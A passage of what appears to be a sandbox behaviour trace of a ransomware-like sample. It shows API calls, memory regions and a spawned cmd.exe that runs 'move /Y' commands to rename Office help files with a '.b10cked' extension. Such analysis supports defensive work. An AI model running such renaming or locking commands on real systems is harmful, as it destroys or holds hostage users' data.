[0202.232] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.233] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.233] _wcsicmp (_String1="MSONEN~1.HXN", _String2=".") returned 63 [0202.233] _wcsicmp (_String1="MSONEN~1.HXN", _String2="..") returned 63 [0202.233] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msonen~1.hxn")) returned 0x2022 [0202.233] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3b1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.233] SetErrorMode (uMode=0x0) returned 0x0 [0202.233] SetErrorMode (uMode=0x1) returned 0x0 [0202.233] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", nBufferLength=0x104, lpBuffer=0x1aed4c, lpFilePart=0x1aed34 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", lpFilePart=0x1aed34*="MSONEN~1.HXN") returned 0x27 [0202.233] SetErrorMode (uMode=0x0) returned 0x1 [0202.233] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.234] _wcsicmp (_String1="MSONEN~1.HXN", _String2=".") returned 63 [0202.234] _wcsicmp (_String1="MSONEN~1.HXN", _String2="..") returned 63 [0202.234] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msonen~1.hxn")) returned 0x2022 [0202.234] SetErrorMode (uMode=0x0) returned 0x0 [0202.234] SetErrorMode (uMode=0x1) returned 0x0 [0202.234] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", nBufferLength=0x104, lpBuffer=0x1af1c8, lpFilePart=0x1aef60 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", lpFilePart=0x1aef60*="MSONEN~1.HXN") returned 0x27 [0202.234] SetErrorMode (uMode=0x0) returned 0x1 [0202.234] SetErrorMode (uMode=0x0) returned 0x0 [0202.234] SetErrorMode (uMode=0x1) returned 0x0 [0202.234] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1af3d0, lpFilePart=0x1aef60 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked", lpFilePart=0x1aef60*="MS.ONENOTE.14.1033.hxn.b10cked") returned 0x39 [0202.234] SetErrorMode (uMode=0x0) returned 0x1 [0202.234] SetLastError (dwErrCode=0x0) [0202.234] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.onenote.14.1033.hxn.b10cked")) returned 0xffffffff [0202.234] GetLastError () returned 0x2 [0202.234] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae8dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae8dc) returned 0x3a0e70 [0202.234] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x1ae8dc | out: lpFindFileData=0x1ae8dc) returned 0 [0202.235] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.235] GetLastError () returned 0x12 [0202.235] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae8dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae8dc) returned 0x3a0e70 [0202.235] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x1ae8dc | out: lpFindFileData=0x1ae8dc) returned 0 [0202.235] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.235] GetLastError () returned 0x12 [0202.236] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1be0) returned 0x3a0e70 [0202.236] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x3b1be0 | out: lpFindFileData=0x3b1be0) returned 0 [0202.236] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.236] GetLastError () returned 0x12 [0202.236] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1be0) returned 0x3a0e70 [0202.236] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x3b1be0 | out: lpFindFileData=0x3b1be0) returned 0 [0202.236] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.236] GetLastError () returned 0x12 [0202.236] _get_osfhandle (_FileHandle=2) returned 0xb [0202.236] GetFileType (hFile=0xb) returned 0x2 [0202.582] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.582] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1aeaac | out: lpMode=0x1aeaac) returned 1 [0202.582] _get_osfhandle (_FileHandle=2) returned 0xb [0202.582] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1aeae0 | out: lpConsoleScreenBufferInfo=0x1aeae0) returned 1 [0202.583] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.583] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeb20 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.584] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1aeb04, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aeb04*=0x2c) returned 1 [0202.584] longjmp () [0202.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.584] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.584] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.584] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.584] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.584] SetConsoleInputExeNameW () returned 0x1 [0202.584] GetConsoleOutputCP () returned 0x1b5 [0202.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.584] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.585] exit (_Code=1) Process: id = "472" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29306 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29307 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29308 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29309 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29310 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29311 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29312 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29313 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29314 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 29315 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30173 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30174 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30175 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30176 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 30177 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 30178 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30179 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30180 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30181 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30182 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30183 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30184 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30185 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30186 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30187 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 30188 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30189 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30190 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30191 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 30192 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30193 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30194 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 30195 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 30196 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 30270 start_va = 0x12d0000 end_va = 0x138ffff entry_point = 0x12d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 669 os_tid = 0xeac [0204.299] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f92c | out: lpSystemTimeAsFileTime=0x12f92c*(dwLowDateTime=0xae94f7a0, dwHighDateTime=0x1d440a9)) [0204.299] GetCurrentProcessId () returned 0xe20 [0204.299] GetCurrentThreadId () returned 0xeac [0204.299] GetTickCount () returned 0x39961 [0204.299] QueryPerformanceCounter (in: lpPerformanceCount=0x12f924 | out: lpPerformanceCount=0x12f924*=26108880003) returned 1 [0204.300] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.300] __set_app_type (_Type=0x1) [0204.300] __p__fmode () returned 0x76b331f4 [0204.301] __p__commode () returned 0x76b331fc [0204.301] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.301] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.301] GetCurrentThreadId () returned 0xeac [0204.301] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeac) returned 0x38 [0204.301] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.301] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.301] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.301] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.301] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f8bc | out: phkResult=0x12f8bc*=0x0) returned 0x2 [0204.301] VirtualQuery (in: lpAddress=0x12f8f3, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.302] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f88c, dwLength=0x1c | out: lpBuffer=0x12f88c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.302] GetConsoleOutputCP () returned 0x1b5 [0204.302] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.302] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.302] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.302] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.302] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.303] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.303] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.303] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.303] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.303] GetEnvironmentStringsW () returned 0x270180* [0204.303] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0204.303] GetEnvironmentStringsW () returned 0x270180* [0204.303] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0204.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e82c | out: phkResult=0x12e82c*=0x40) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0xa8, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x0, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegCloseKey (hKey=0x40) returned 0x0 [0204.304] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e82c | out: phkResult=0x12e82c*=0x40) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x40, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x1, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x0, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x9, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x4, lpData=0x12e838*=0x9, lpcbData=0x12e830*=0x4) returned 0x0 [0204.304] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e834, lpData=0x12e838, lpcbData=0x12e830*=0x1000 | out: lpType=0x12e834*=0x0, lpData=0x12e838*=0x9, lpcbData=0x12e830*=0x1000) returned 0x2 [0204.304] RegCloseKey (hKey=0x40) returned 0x0 [0204.304] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.304] srand (_Seed=0x5b8863a6) [0204.305] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"" [0204.305] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"" [0204.305] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.305] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.306] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.306] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.306] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.306] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.306] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.306] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.306] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.306] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.306] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.306] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.306] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.306] GetEnvironmentStringsW () returned 0x2722d0* [0204.306] FreeEnvironmentStringsW (penv=0x2722d0) returned 1 [0204.306] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.306] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.307] _wcsicmp (_String1="KEYS", 